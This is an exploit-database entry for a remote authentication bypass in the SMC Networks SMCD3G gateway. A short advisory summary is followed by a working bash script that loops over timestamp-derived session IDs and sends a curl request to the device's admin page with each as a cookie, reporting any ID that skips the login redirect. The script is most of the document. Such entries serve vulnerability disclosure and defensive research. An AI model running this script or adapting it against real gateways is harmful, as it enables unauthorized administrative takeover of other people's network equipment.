[] NeoSense

SMC Networks SMCD3G Session Management - Authentication Bypass

Author: Zack Fasel & Matthew Jakubowski
type: remote
platform: multiple
port: 
date_added: 2011-02-04 
date_updated: 2014-11-22 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/46178/info

The SMC Networks SMCD3G gateway is prone to a remote authentication-bypass vulnerability.

An attacker can exploit this issue to gain unauthorized administrative access to the affected devices.

#!/bin/bash
start=1267604160
end=1267605960
for (( i=$start; i<=$end; i++)) do if [ `curl -sb userid=$i
http://10.1.10.1/admin/index.asp | grep -c login.asp` -lt
"1" ] then echo "Session ID Found:  $i"
fi
if [ $(($i % 100)) -eq "0" ]
then echo "Currently at $i"
fi
done